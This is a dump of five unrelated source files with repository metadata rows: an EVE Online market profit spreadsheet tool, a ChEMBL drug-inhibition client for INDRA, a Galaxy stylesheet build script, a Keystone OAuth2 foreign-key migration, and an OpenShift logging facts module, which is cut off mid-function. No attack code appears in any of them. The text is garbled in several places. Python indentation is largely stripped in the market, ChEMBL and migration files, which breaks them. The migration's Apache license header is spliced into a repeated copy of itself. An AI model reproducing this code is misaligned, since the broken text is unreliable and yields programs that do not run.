Snflow/market | market.py | 1 | 5924 | import urllib
import simplejson
import xlwt
import sys
import getopt
import os.path
from pprint import pprint
def get_price(typeID=34, scale='regionlimit', scaleID=10000043):
# Generate api address on eve-central
api_address = "http://api.eve-central.com/api/marketstat/json?typeid="+str(typeID)+"&"+scale+"="+str(scaleID)
# Receive raw market JSON strings.
market_file = urllib.urlopen(api_address)
market_json = market_file.read()
market_file.close()
if market_json=='A non-marketable type was given':
# Non-marketable item
return(0.0, 0.0)
# Un-serialize the JSON data to a Python dict.
market_data = simplejson.loads(market_json)
# Get buy and sell prices.
buy_price = market_data[0]["buy"]["max"]
sell_price = market_data[0]["sell"]["min"]
return(buy_price, sell_price)
def get_history(typeID=34, regionID=10000043, days=10):
    api_address = "http://api.eve-marketdata.com/api/item_history2.json?char_name=market&region_ids="+str(regionID)+"&type_ids="+str(typeID)+"&days="+str(days)
history_file = urllib.urlopen(api_address)
history_json = history_file.read()
history_file.close()
history_data = simplejson.loads(history_json)
total_volume = 0
n_days = 0
for single_day in history_data["emd"]["result"]:
total_volume = total_volume + int(single_day["row"]["volume"])
n_days = n_days + 1
avg_volume = total_volume/max(1,n_days)
if n_days == 0:
avg_volume = 0
return avg_volume
def broker_tax(buy_price, sell_price):
# Broker fee ratio, affected by both skill and standings.
broker_ratio = 0.0075
# Tax ratio, only affected by skill.
tax_ratio = 0.0075
# Broker fees for buy and sell.
broker_buy = broker_ratio*buy_price
broker_sell = broker_ratio*sell_price
broker = broker_buy + broker_sell
# Tax for sell.
tax = tax_ratio*sell_price
return(broker, tax)
def unit_profit(buy_price, sell_price):
non_zero = 0.0000001
(broker, tax) = broker_tax(buy_price, sell_price)
profit = sell_price - buy_price - broker - tax
profit_ratio = profit/(buy_price+non_zero)
return (profit, profit_ratio)
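# A small worked example (made-up prices, same 0.75% broker fee and 0.75% tax as above).
def profit_example():
    buy_price, sell_price = 100.0, 120.0
    broker, tax = broker_tax(buy_price, sell_price)     # broker = 1.65, tax = 0.90
    profit, ratio = unit_profit(buy_price, sell_price)  # profit = 17.45, ratio ~= 0.1745
    return profit, ratio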
def read_data():
if not os.path.isfile('data'):
import typeID
file = open('data')
type_json = simplejson.load(file)
file.close()
return type_json
def main(argv):
regionID = 10000043
systemID = 30002187
ID = 34
volume_threshold = 100
days = 10
region_flag = False
system_flag = False
item_flag = False
try:
opts, args = getopt.getopt(argv,"r:v:s:d:i:", ["region=","volume=","system=","days=","item="])
except getopt.GetoptError:
print 'python market.py -r <regionID> -v <volume_threshold> -s <systemID> -d <days_for_volume> -i <item>'
sys.exit(2)
for opt,arg in opts:
if opt in ("-r", "--region"):
regionID = arg
region_flag = True
elif opt in ("-v", "--volume"):
volume_threshold = int(arg)
elif opt in ("-s", "--system"):
systemID = arg
system_flag = True
elif opt in ("-d", "--days"):
days = int(arg)
elif opt in ("-i", "--item"):
ID = arg
item_flag = True
if (system_flag == True and region_flag == False):
print "Must specify the region ID which contains the system:", systemID
exit()
print "EVE Market Analyzer is generating the marketing data for:"
print " Region:", regionID
if system_flag == True:
print " System:", systemID
outfile = "system_"+str(systemID)+"&volume_"+str(volume_threshold)+"&days_"+str(days)+".xls"
else:
outfile = "region_"+str(regionID)+"&volume_"+str(volume_threshold)+"&days_"+str(days)+".xls"
print " The minimal average volume requirement in the past", days,"days is:", volume_threshold
type_json = read_data()
book = xlwt.Workbook(encoding="utf-8")
sh = book.add_sheet("profit")
sh.write(0,0,"Item")
sh.write(0,1,"Type ID")
sh.write(0,2,"Buy Price")
sh.write(0,3,"Sell Price")
sh.write(0,4,"Profit per Order")
sh.write(0,5,"Average Volume")
sh.write(0,6,"Total Profit Available")
sh.write(0,7,"Profit Rate")
price_style = xlwt.XFStyle()
price_style.num_format_str = '#,##0.00'
num_style = xlwt.XFStyle()
num_style.num_format_str = '#,##0'
percentage_style = xlwt.XFStyle()
percentage_style.num_format_str = '0.00%'
sh.col(0).width = 256*20
sh.col(1).width = 256*7
sh.col(4).width = 256*16
sh.col(5).width = 256*16
sh.col(6).width = 256*22
i = 0
j = 1
while type_json[i]["ID"] != 'end':
ID = type_json[i]["ID"]
name = type_json[i]["name"]
if system_flag:
(buy_price, sell_price) = get_price(typeID=ID, scale='usesystem', scaleID=systemID)
else:
(buy_price, sell_price) = get_price(typeID=ID, scaleID=regionID)
if (buy_price != 0 and sell_price != 0):
(profit, profit_ratio) = unit_profit(buy_price, sell_price)
avg_volume = get_history(typeID=ID, regionID=regionID, days=days)
if avg_volume >= volume_threshold :
profit_total = avg_volume * profit
sh.write(j,0,name)
sh.write(j,1,ID)
sh.write(j,2,buy_price,price_style)
sh.write(j,3,sell_price,price_style)
sh.write(j,4,profit,price_style)
sh.write(j,5,avg_volume,num_style)
sh.write(j,6,profit_total,price_style)
sh.write(j,7,profit_ratio,percentage_style)
# print "Type ID:", ID, ", Item:", name
j = j+1
i = i+1
print "Type ID:", ID, ", Item:", name
book.save(outfile)
if __name__ == '__main__':
main(sys.argv[1:])
| mit | 3,605,402,687,740,820,500 | 32.468927 | 159 | 0.591492 | false |
pvtodorov/indra | indra/databases/chembl_client.py | 2 | 10360 | from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import logging
import requests
from sympy.physics import units
from indra.databases import chebi_client, uniprot_client
from indra.statements import Inhibition, Agent, Evidence
from collections import defaultdict
logger = logging.getLogger(__name__)
def get_inhibition(drug, target):
chebi_id = drug.db_refs.get('CHEBI')
mesh_id = drug.db_refs.get('MESH')
if chebi_id:
drug_chembl_id = chebi_client.get_chembl_id(chebi_id)
elif mesh_id:
drug_chembl_id = get_chembl_id(mesh_id)
else:
logger.error('Drug missing ChEBI or MESH grounding.')
return None
target_upid = target.db_refs.get('UP')
if not target_upid:
logger.error('Target missing UniProt grounding.')
return None
target_chembl_id = get_target_chemblid(target_upid)
logger.info('Drug: %s, Target: %s' % (drug_chembl_id, target_chembl_id))
query_dict = {'query': 'activity',
'params': {'molecule_chembl_id': drug_chembl_id,
'target_chembl_id': target_chembl_id,
'limit': 10000}}
res = send_query(query_dict)
evidence = []
for assay in res['activities']:
ev = get_evidence(assay)
if not ev:
continue
evidence.append(ev)
st = Inhibition(drug, target, evidence=evidence)
return st
def get_drug_inhibition_stmts(drug):
    """Query ChEMBL for kinetics data given a drug Agent and return statements.
Parameters
----------
drug : Agent
Agent representing drug with MESH or CHEBI grounding
Returns
-------
stmts : list of INDRA statements
INDRA statements generated by querying ChEMBL for all kinetics data of
a drug interacting with protein targets
"""
chebi_id = drug.db_refs.get('CHEBI')
mesh_id = drug.db_refs.get('MESH')
if chebi_id:
drug_chembl_id = chebi_client.get_chembl_id(chebi_id)
elif mesh_id:
drug_chembl_id = get_chembl_id(mesh_id)
else:
logger.error('Drug missing ChEBI or MESH grounding.')
return None
logger.info('Drug: %s' % (drug_chembl_id))
query_dict = {'query': 'activity',
'params': {'molecule_chembl_id': drug_chembl_id,
'limit': 10000}
}
res = send_query(query_dict)
activities = res['activities']
targ_act_dict = activities_by_target(activities)
target_chembl_ids = [x for x in targ_act_dict]
protein_targets = get_protein_targets_only(target_chembl_ids)
filtered_targ_act_dict = {t: targ_act_dict[t]
for t in [x for x in protein_targets]}
stmts = []
for target_chembl_id in filtered_targ_act_dict:
target_activity_ids = filtered_targ_act_dict[target_chembl_id]
target_activites = [x for x in activities
if x['activity_id'] in target_activity_ids]
target_upids = []
targ_comp = protein_targets[target_chembl_id]['target_components']
for t_c in targ_comp:
target_upids.append(t_c['accession'])
evidence = []
for assay in target_activites:
ev = get_evidence(assay)
if not ev:
continue
evidence.append(ev)
if len(evidence) > 0:
for target_upid in target_upids:
agent_name = uniprot_client.get_gene_name(target_upid)
target_agent = Agent(agent_name, db_refs={'UP': target_upid})
st = Inhibition(drug, target_agent, evidence=evidence)
stmts.append(st)
return stmts
def send_query(query_dict):
"""Query ChEMBL API
Parameters
----------
query_dict : dict
'query' : string of the endpoint to query
'params' : dict of params for the query
Returns
-------
js : dict
dict parsed from json that is unique to the submitted query
"""
query = query_dict['query']
params = query_dict['params']
url = 'https://www.ebi.ac.uk/chembl/api/data/' + query + '.json'
r = requests.get(url, params=params)
r.raise_for_status()
js = r.json()
return js
def query_target(target_chembl_id):
"""Query ChEMBL API target by id
Parameters
----------
target_chembl_id : str
Returns
-------
target : dict
dict parsed from json that is unique for the target
"""
query_dict = {'query': 'target',
'params': {'target_chembl_id': target_chembl_id,
'limit': 1}}
res = send_query(query_dict)
target = res['targets'][0]
return target
def activities_by_target(activities):
"""Get back lists of activities in a dict keyed by ChEMBL target id
Parameters
----------
activities : list
response from a query returning activities for a drug
Returns
-------
targ_act_dict : dict
dictionary keyed to ChEMBL target ids with lists of activity ids
"""
targ_act_dict = defaultdict(lambda: [])
for activity in activities:
target_chembl_id = activity['target_chembl_id']
activity_id = activity['activity_id']
targ_act_dict[target_chembl_id].append(activity_id)
for target_chembl_id in targ_act_dict:
targ_act_dict[target_chembl_id] = \
list(set(targ_act_dict[target_chembl_id]))
return targ_act_dict
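def _activities_by_target_example():
    """A minimal sketch with fabricated activity dicts (only the two keys read
    above are filled in): assays against the same target collapse under one
    ChEMBL target id, e.g. {'CHEMBL203': [1, 2], 'CHEMBL204': [3]}."""
    activities = [{'target_chembl_id': 'CHEMBL203', 'activity_id': 1},
                  {'target_chembl_id': 'CHEMBL203', 'activity_id': 2},
                  {'target_chembl_id': 'CHEMBL204', 'activity_id': 3}]
    return activities_by_target(activities)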
def get_protein_targets_only(target_chembl_ids):
"""Given list of ChEMBL target ids, return dict of SINGLE PROTEIN targets
Parameters
----------
target_chembl_ids : list
list of chembl_ids as strings
Returns
-------
protein_targets : dict
dictionary keyed to ChEMBL target ids with lists of activity ids
"""
protein_targets = {}
for target_chembl_id in target_chembl_ids:
target = query_target(target_chembl_id)
if 'SINGLE PROTEIN' in target['target_type']:
protein_targets[target_chembl_id] = target
return protein_targets
def get_evidence(assay):
"""Given an activity, return an INDRA Evidence object.
Parameters
----------
assay : dict
an activity from the activities list returned by a query to the API
Returns
-------
ev : :py:class:`Evidence`
        an :py:class:`Evidence` object containing the kinetics measured in the assay
"""
kin = get_kinetics(assay)
source_id = assay.get('assay_chembl_id')
if not kin:
return None
annotations = {'kinetics': kin}
chembl_doc_id = str(assay.get('document_chembl_id'))
pmid = get_pmid(chembl_doc_id)
ev = Evidence(source_api='chembl', pmid=pmid, source_id=source_id,
annotations=annotations)
return ev
def get_kinetics(assay):
"""Given an activity, return its kinetics values.
Parameters
----------
assay : dict
an activity from the activities list returned by a query to the API
Returns
-------
kin : dict
dictionary of values with units keyed to value types 'IC50', 'EC50',
'INH', 'Potency', 'Kd'
"""
try:
val = float(assay.get('standard_value'))
except TypeError:
logger.warning('Invalid assay value: %s' % assay.get('standard_value'))
return None
unit = assay.get('standard_units')
if unit == 'nM':
unit_sym = 1e-9 * units.mol / units.liter
elif unit == 'uM':
unit_sym = 1e-6 * units.mol / units.liter
else:
logger.warning('Unhandled unit: %s' % unit)
return None
param_type = assay.get('standard_type')
if param_type not in ['IC50', 'EC50', 'INH', 'Potency', 'Kd']:
logger.warning('Unhandled parameter type: %s' % param_type)
logger.info(str(assay))
return None
kin = {param_type: val * unit_sym}
return kin
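# Worked example (illustrative): for a hypothetical activity record such as
#     {'standard_value': '50', 'standard_units': 'nM', 'standard_type': 'IC50'}
# get_kinetics returns {'IC50': 5e-08 * units.mol / units.liter}, i.e. 50 nM
# expressed with the unit objects this module assumes.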
def get_pmid(doc_id):
"""Get PMID from document_chembl_id
Parameters
----------
doc_id : str
Returns
-------
pmid : str
"""
url_pmid = 'https://www.ebi.ac.uk/chembl/api/data/document.json'
params = {'document_chembl_id': doc_id}
res = requests.get(url_pmid, params=params)
js = res.json()
pmid = str(js['documents'][0]['pubmed_id'])
return pmid
def get_target_chemblid(target_upid):
"""Get ChEMBL ID from UniProt upid
Parameters
----------
target_upid : str
Returns
-------
target_chembl_id : str
"""
url = 'https://www.ebi.ac.uk/chembl/api/data/target.json'
params = {'target_components__accession': target_upid}
r = requests.get(url, params=params)
r.raise_for_status()
js = r.json()
target_chemblid = js['targets'][0]['target_chembl_id']
return target_chemblid
def get_mesh_id(nlm_mesh):
"""Get MESH ID from NLM MESH
Parameters
----------
nlm_mesh : str
Returns
-------
mesh_id : str
"""
url_nlm2mesh = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi'
params = {'db': 'mesh', 'term': nlm_mesh, 'retmode': 'JSON'}
r = requests.get(url_nlm2mesh, params=params)
res = r.json()
mesh_id = res['esearchresult']['idlist'][0]
return mesh_id
def get_pcid(mesh_id):
"""Get PC ID from MESH ID
Parameters
----------
mesh : str
Returns
-------
pcid : str
"""
url_mesh2pcid = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/elink.fcgi'
params = {'dbfrom': 'mesh', 'id': mesh_id,
'db': 'pccompound', 'retmode': 'JSON'}
r = requests.get(url_mesh2pcid, params=params)
res = r.json()
pcid = res['linksets'][0]['linksetdbs'][0]['links'][0]
return pcid
def get_chembl_id(nlm_mesh):
"""Get ChEMBL ID from NLM MESH
Parameters
----------
nlm_mesh : str
Returns
-------
chembl_id : str
"""
mesh_id = get_mesh_id(nlm_mesh)
pcid = get_pcid(mesh_id)
url_mesh2pcid = 'https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/' + \
'cid/%s/synonyms/JSON' % pcid
r = requests.get(url_mesh2pcid)
res = r.json()
synonyms = res['InformationList']['Information'][0]['Synonym']
chembl_id = [syn for syn in synonyms
if 'CHEMBL' in syn and 'SCHEMBL' not in syn][0]
return chembl_id
| bsd-2-clause | 1,453,831,027,947,524,400 | 28.431818 | 79 | 0.592568 | false |
volpino/Yeps-EURAC | static/june_2007_style/make_style.py | 1 | 3931 | #!/usr/bin/env python
#from galaxy import eggs
#import pkg_resources
#pkg_resources.require("Cheetah")
import sys, string, os.path, tempfile, subprocess
#from galaxy import eggs
import pkg_resources
pkg_resources.require( "Cheetah" )
from Cheetah.Template import Template
from subprocess import Popen, PIPE
assert sys.version_info[:2] >= ( 2, 4 )
# To create a new style ( this is an example ):
# python make_style.py blue_colors.ini blue
def run( cmd ):
return Popen( cmd, stdout=PIPE).communicate()[0]
templates = [ ( "base.css.tmpl", "base.css" ),
( "panel_layout.css.tmpl", "panel_layout.css" ),
( "masthead.css.tmpl", "masthead.css"),
( "library.css.tmpl", "library.css"),
( "history.css.tmpl", "history.css" ),
( "tool_menu.css.tmpl", "tool_menu.css" ),
( "iphone.css.tmpl", "iphone.css" ),
( "reset.css.tmpl", "reset.css" ),
( "autocomplete_tagging.css.tmpl", "autocomplete_tagging.css") ]
images = [
( "./gradient.py 9 30 $panel_header_bg_top - $panel_header_bg_bottom 0 0 $panel_header_bg_bottom 1 1", "panel_header_bg.png" ),
( "./gradient.py 9 30 $panel_header_bg_bottom - $panel_header_bg_top 0 0 $panel_header_bg_top 1 1", "panel_header_bg_pressed.png" ),
( "./gradient.py 9 1000 $menu_bg_top $menu_bg_hatch $menu_bg_over 0 0 $menu_bg_over 1 1", "menu_bg.png" ),
( "./gradient.py 9 1000 $base_bg_top - $base_bg_bottom 0 0 $base_bg_bottom 1 1", "base_bg.png" ),
( "./gradient.py 9 500 $form_body_bg_top - $form_body_bg_bottom 0 0 $form_body_bg_bottom 1 1", "form_body_bg.png" ),
( "./gradient.py 9 50 $masthead_bg $masthead_bg_hatch", "masthead_bg.png" ),
( "./gradient.py 9 30 $footer_title_bg $footer_title_hatch 000000 0 0.5 000000 1 1", "footer_title_bg.png" ),
( "./gradient.py 9 50 $form_title_bg_top $form_title_bg_hatch $form_title_bg_bottom 0 0 $form_title_bg_bottom 1 1", "form_title_bg.png" ),
( "./gradient.py 9 200 $history_ok_bg - FFFFFF 0 0.5 FFFFFF 0.5 1", "ok_bg.png" ),
( "./gradient.py 9 200 $history_error_bg - FFFFFF 0 0.5 FFFFFF 0.5 1", "error_bg.png" ),
( "./gradient.py 9 200 $history_running_bg - FFFFFF 0 0.5 FFFFFF 0.5 1", "warn_bg.png" ),
( "./gradient.py 9 200 $history_queued_bg - FFFFFF 0 0.5 FFFFFF 0.5 1", "gray_bg.png" ),
( "./callout_top.py 20 10 $panel_header_bg_top $layout_border", "popupmenu_callout_top.png" ),
( "./circle.py 12 #FFFFFF #D8B365 right > workflow_circle_open.png" ),
( "./circle.py 12 #BBFFBB #D8B365 right > workflow_circle_green.png" ),
( "./circle.py 12 #FFFFFF #D8B365 none> workflow_circle_drag.png" ),
]
shared_images = [
# Dialog boxes
( "ok_large.png", "done_message_bg", "done_message_icon.png" ),
( "info_large.png", "info_message_bg", "info_message_icon.png" ),
( "warn_large.png", "warn_message_bg", "warn_message_icon.png" ),
( "error_large.png", "error_message_bg", "error_message_icon.png" ),
# History icons
( "ok_small.png", "history_ok_bg", "data_ok.png" ),
( "error_small.png", "history_error_bg", "data_error.png" ),
( "wait_small.png", "history_queued_bg", "data_queued.png" ),
]
vars, out_dir = sys.argv[1:]
for input, output in templates:
print input ,"->", output
subprocess.call( "./process_css.py %s %s < %s > %s" % ( vars, out_dir, input, os.path.join( out_dir, output ) ), shell=True )
"""
for rule, output in images:
t = string.Template( rule ).substitute( context )
print t, "->", output
open( os.path.join( out_dir, output ), "w" ).write( run( t.split() ) )
for src, bg, out in shared_images:
t = "./png_over_color.py shared_images/%s %s %s" % ( src, context[bg], os.path.join( out_dir, out ) )
print t
run( t.split() )
"""
| mit | -27,098,766,214,723 | 46.939024 | 149 | 0.59247 | false |
ging/keystone-oauth2-extension | oauth2/migrate_repo/versions/007_on_delete_cascade_on_consumer_credentials_client_id.py | 2 | 2648 | # Copyright (C) 2014 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# Copyright (C) 2014 Universidad Politecnica de Madrid
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sqlalchemy as sql
from migrate.changeset.constraint import ForeignKeyConstraint
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
meta = sql.MetaData()
meta.bind = migrate_engine
if 'mysql' in str(meta):
consumer_credentials_table = sql.Table('consumer_credentials_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_ibfk_1').drop()
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_ibfk_1', ondelete='CASCADE').create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
meta = sql.MetaData()
meta.bind = migrate_engine
if 'mysql' in str(meta):
consumer_credentials_table = sql.Table('consumer_credentials_oauth2', meta, autoload=True)
consumer_oauth2 = sql.Table('consumer_oauth2', meta, autoload=True)
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_ibfk_1', ondelete='CASCADE').drop()
ForeignKeyConstraint(
columns=[consumer_credentials_table.c.client_id],
refcolumns=[consumer_oauth2.c.id],
name='consumer_credentials_oauth2_ibfk_1').create()
| apache-2.0 | 676,433,779,511,974,300 | 39.121212 | 98 | 0.700151 | false |
ivanhorvath/openshift-tools | openshift/installer/vendored/openshift-ansible-3.9.14-1/roles/openshift_logging/library/openshift_logging_facts.py | 11 | 15078 | '''
---
module: openshift_logging_facts
version_added: ""
short_description: Gather facts about the OpenShift logging stack
description:
- Determine the current facts about the OpenShift logging stack (e.g. cluster size)
options:
author: Red Hat, Inc
'''
import copy
import json
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import
from subprocess import * # noqa: F402,F403
# ignore pylint errors related to the module_utils import
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import
from ansible.module_utils.basic import * # noqa: F402,F403
import yaml
EXAMPLES = """
- action: openshift_logging_facts
"""
RETURN = """
"""
DEFAULT_OC_OPTIONS = ["-o", "json"]
# constants used for various labels and selectors
COMPONENT_KEY = "component"
LOGGING_INFRA_KEY = "logging-infra"
# selectors for filtering resources
DS_FLUENTD_SELECTOR = LOGGING_INFRA_KEY + "=" + "fluentd"
LOGGING_SELECTOR = LOGGING_INFRA_KEY + "=" + "support"
ROUTE_SELECTOR = "component=support,logging-infra=support,provider=openshift"
COMPONENTS = ["kibana", "curator", "elasticsearch", "fluentd", "kibana_ops", "curator_ops", "elasticsearch_ops"]
class OCBaseCommand(object):
''' The base class used to query openshift '''
def __init__(self, binary, kubeconfig, namespace):
''' the init method of OCBaseCommand class '''
self.binary = binary
self.kubeconfig = kubeconfig
self.user = self.get_system_admin(self.kubeconfig)
self.namespace = namespace
# pylint: disable=no-self-use
def get_system_admin(self, kubeconfig):
''' Retrieves the system admin '''
with open(kubeconfig, 'r') as kubeconfig_file:
config = yaml.load(kubeconfig_file)
for user in config["users"]:
if user["name"].startswith("system:admin"):
return user["name"]
raise Exception("Unable to find system:admin in: " + kubeconfig)
# pylint: disable=too-many-arguments, dangerous-default-value
def oc_command(self, sub, kind, namespace=None, name=None, add_options=None):
''' Wrapper method for the "oc" command '''
cmd = [self.binary, sub, kind]
if name is not None:
cmd = cmd + [name]
if namespace is not None:
cmd = cmd + ["-n", namespace]
if add_options is None:
add_options = []
cmd = cmd + ["--user=" + self.user, "--config=" + self.kubeconfig] + DEFAULT_OC_OPTIONS + add_options
try:
process = Popen(cmd, stdout=PIPE, stderr=PIPE) # noqa: F405
out, err = process.communicate(cmd)
if len(err) > 0:
if 'not found' in err:
return {'items': []}
if 'No resources found' in err:
return {'items': []}
raise Exception(err)
except Exception as excp:
err = "There was an exception trying to run the command '" + " ".join(cmd) + "' " + str(excp)
raise Exception(err)
return json.loads(out)
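# Illustrative sketch of the shell command the wrapper above builds; the
# namespace, user and kubeconfig values are examples taken from defaults in
# this module:
#
#     oc_command('get', 'routes', namespace='logging',
#                add_options=['-l', ROUTE_SELECTOR])
#
# runs roughly:
#
#     oc get routes -n logging --user=system:admin \
#         --config=/etc/origin/master/admin.kubeconfig -o json \
#         -l component=support,logging-infra=support,provider=openshift
#
# and parses the JSON it prints.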
class OpenshiftLoggingFacts(OCBaseCommand):
''' The class structure for holding the OpenshiftLogging Facts'''
name = "facts"
def __init__(self, logger, binary, kubeconfig, namespace):
''' The init method for OpenshiftLoggingFacts '''
super(OpenshiftLoggingFacts, self).__init__(binary, kubeconfig, namespace)
self.logger = logger
self.facts = dict()
def default_keys_for(self, kind):
''' Sets the default key values for kind '''
for comp in COMPONENTS:
self.add_facts_for(comp, kind)
def add_facts_for(self, comp, kind, name=None, facts=None):
''' Add facts for the provided kind '''
if comp not in self.facts:
self.facts[comp] = dict()
if kind not in self.facts[comp]:
self.facts[comp][kind] = dict()
if name:
self.facts[comp][kind][name] = facts
def facts_for_routes(self, namespace):
''' Gathers facts for Routes in logging namespace '''
self.default_keys_for("routes")
route_list = self.oc_command("get", "routes", namespace=namespace, add_options=["-l", ROUTE_SELECTOR])
if len(route_list["items"]) == 0:
return None
for route in route_list["items"]:
name = route["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
self.add_facts_for(comp, "routes", name, dict(host=route["spec"]["host"]))
self.facts["agl_namespace"] = namespace
def facts_for_daemonsets(self, namespace):
''' Gathers facts for Daemonsets in logging namespace '''
self.default_keys_for("daemonsets")
ds_list = self.oc_command("get", "daemonsets", namespace=namespace,
add_options=["-l", LOGGING_INFRA_KEY + "=fluentd"])
if len(ds_list["items"]) == 0:
return
for ds_item in ds_list["items"]:
name = ds_item["metadata"]["name"]
comp = self.comp(name)
spec = ds_item["spec"]["template"]["spec"]
container = spec["containers"][0]
result = dict(
selector=ds_item["spec"]["selector"],
image=container["image"],
resources=container["resources"],
nodeSelector=spec["nodeSelector"],
serviceAccount=spec["serviceAccount"],
terminationGracePeriodSeconds=spec["terminationGracePeriodSeconds"]
)
self.add_facts_for(comp, "daemonsets", name, result)
def facts_for_pvcs(self, namespace):
''' Gathers facts for PVCS in logging namespace'''
self.default_keys_for("pvcs")
pvclist = self.oc_command("get", "pvc", namespace=namespace, add_options=["-l", LOGGING_INFRA_KEY])
if len(pvclist["items"]) == 0:
return
for pvc in pvclist["items"]:
name = pvc["metadata"]["name"]
comp = self.comp(name)
self.add_facts_for(comp, "pvcs", name, dict())
def facts_for_deploymentconfigs(self, namespace):
''' Gathers facts for DeploymentConfigs in logging namespace '''
self.default_keys_for("deploymentconfigs")
dclist = self.oc_command("get", "deploymentconfigs", namespace=namespace, add_options=["-l", LOGGING_INFRA_KEY])
if len(dclist["items"]) == 0:
return
dcs = dclist["items"]
for dc_item in dcs:
name = dc_item["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
spec = dc_item["spec"]["template"]["spec"]
facts = dict(
name=name,
selector=dc_item["spec"]["selector"],
replicas=dc_item["spec"]["replicas"],
serviceAccount=spec["serviceAccount"],
containers=dict(),
volumes=dict()
)
if "nodeSelector" in spec:
facts["nodeSelector"] = spec["nodeSelector"]
if "supplementalGroups" in spec["securityContext"]:
facts["storageGroups"] = spec["securityContext"]["supplementalGroups"]
facts["spec"] = spec
if "volumes" in spec:
for vol in spec["volumes"]:
clone = copy.deepcopy(vol)
clone.pop("name", None)
facts["volumes"][vol["name"]] = clone
for container in spec["containers"]:
facts["containers"][container["name"]] = container
self.add_facts_for(comp, "deploymentconfigs", name, facts)
def facts_for_services(self, namespace):
''' Gathers facts for services in logging namespace '''
self.default_keys_for("services")
servicelist = self.oc_command("get", "services", namespace=namespace, add_options=["-l", LOGGING_SELECTOR])
if len(servicelist["items"]) == 0:
return
for service in servicelist["items"]:
name = service["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
self.add_facts_for(comp, "services", name, dict())
# pylint: disable=too-many-arguments
def facts_from_configmap(self, comp, kind, name, config_key, yaml_file=None):
'''Extracts facts in logging namespace from configmap'''
if yaml_file is not None:
if config_key.endswith(".yml") or config_key.endswith(".yaml"):
config_facts = yaml.load(yaml_file)
self.facts[comp][kind][name][config_key] = config_facts
self.facts[comp][kind][name][config_key]["raw"] = yaml_file
def facts_for_configmaps(self, namespace):
''' Gathers facts for configmaps in logging namespace '''
self.default_keys_for("configmaps")
a_list = self.oc_command("get", "configmaps", namespace=namespace)
if len(a_list["items"]) == 0:
return
for item in a_list["items"]:
name = item["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
self.add_facts_for(comp, "configmaps", name, dict(item["data"]))
if comp in ["elasticsearch", "elasticsearch_ops"]:
for config_key in item["data"]:
self.facts_from_configmap(comp, "configmaps", name, config_key, item["data"][config_key])
def facts_for_oauthclients(self, namespace):
''' Gathers facts for oauthclients used with logging '''
self.default_keys_for("oauthclients")
a_list = self.oc_command("get", "oauthclients", namespace=namespace, add_options=["-l", LOGGING_SELECTOR])
if len(a_list["items"]) == 0:
return
for item in a_list["items"]:
name = item["metadata"]["name"]
comp = self.comp(name)
if comp is not None:
result = dict(
redirectURIs=item["redirectURIs"]
)
self.add_facts_for(comp, "oauthclients", name, result)
def facts_for_secrets(self, namespace):
''' Gathers facts for secrets in the logging namespace '''
self.default_keys_for("secrets")
a_list = self.oc_command("get", "secrets", namespace=namespace)
if len(a_list["items"]) == 0:
return
for item in a_list["items"]:
name = item["metadata"]["name"]
comp = self.comp(name)
if comp is not None and item["type"] == "Opaque":
result = dict(
keys=item["data"].keys()
)
self.add_facts_for(comp, "secrets", name, result)
def facts_for_sccs(self):
''' Gathers facts for SCCs used with logging '''
self.default_keys_for("sccs")
scc = self.oc_command("get", "scc", name="privileged")
if len(scc["users"]) == 0:
return
for item in scc["users"]:
comp = self.comp(item)
if comp is not None:
self.add_facts_for(comp, "sccs", "privileged", dict())
def facts_for_clusterrolebindings(self, namespace):
''' Gathers ClusterRoleBindings used with logging '''
self.default_keys_for("clusterrolebindings")
role = self.oc_command("get", "clusterrolebindings", name="cluster-readers")
if "subjects" not in role or len(role["subjects"]) == 0:
return
for item in role["subjects"]:
comp = self.comp(item["name"])
if comp is not None and namespace == item.get("namespace"):
self.add_facts_for(comp, "clusterrolebindings", "cluster-readers", dict())
# this needs to end up nested under the service account...
def facts_for_rolebindings(self, namespace):
''' Gathers facts for RoleBindings used with logging '''
self.default_keys_for("rolebindings")
role = self.oc_command("get", "rolebindings", namespace=namespace, name="logging-elasticsearch-view-role")
if "subjects" not in role or len(role["subjects"]) == 0:
return
for item in role["subjects"]:
comp = self.comp(item["name"])
if comp is not None and namespace == item.get("namespace"):
self.add_facts_for(comp, "rolebindings", "logging-elasticsearch-view-role", dict())
# pylint: disable=no-self-use, too-many-return-statements
def comp(self, name):
''' Does a comparison to evaluate the logging component '''
if name.startswith("logging-curator-ops"):
return "curator_ops"
elif name.startswith("logging-kibana-ops") or name.startswith("kibana-ops"):
return "kibana_ops"
elif name.startswith("logging-es-ops") or name.startswith("logging-elasticsearch-ops"):
return "elasticsearch_ops"
elif name.startswith("logging-curator"):
return "curator"
elif name.startswith("logging-kibana") or name.startswith("kibana"):
return "kibana"
elif name.startswith("logging-es") or name.startswith("logging-elasticsearch"):
return "elasticsearch"
elif name.startswith("logging-fluentd") or name.endswith("aggregated-logging-fluentd"):
